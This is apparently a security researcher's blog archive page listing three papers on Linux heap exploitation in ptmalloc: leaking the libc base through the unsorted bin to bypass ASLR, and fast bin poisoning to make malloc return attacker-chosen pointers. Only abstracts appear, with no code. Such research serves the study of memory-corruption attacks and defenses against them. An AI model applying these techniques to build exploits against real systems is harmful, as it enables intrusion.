Posts

Showing posts from September, 2019

Linux Heap Unsorted Bin LIBC Base Leak

In this paper, I introduce the reader to a method to disclose the libc base in the presence of ASLR given an information leak in the unsorted bin of the Linux Heap allocator, ptmalloc. Linux Heap Unsorted Bin LIBC Base Leak.PDF

Linux Heap Fast Bin Poisoning part 2

In this paper, I introduce the reader to a heap metadata corruption against the current Linux Heap allocator, ptmalloc. The attack is performed via corrupting, or poisoning the fast bin such that malloc returns an arbitrary pointer. It relaxes the requirements in part 1 of this paper and can now return an arbitrary pointer. For this to happen, more heap grooming is required. Linux Heap Fast Bin Poisoning part 2.PDF

Linux Heap Fast Bin Poisoning part 1

In this paper, I introduce the reader to a heap metadata corruption against the current Linux Heap allocator, ptmalloc. The attack is performed via corrupting, or poisoning the fast bin such that malloc returns a near arbitrary pointer. This may allow for control flow hijacking if malloc returns a pointer to a function pointer and an attacker is able to write to that malloc returned buffer. Linux Heap Fast Bin Poisoning part 1.PDF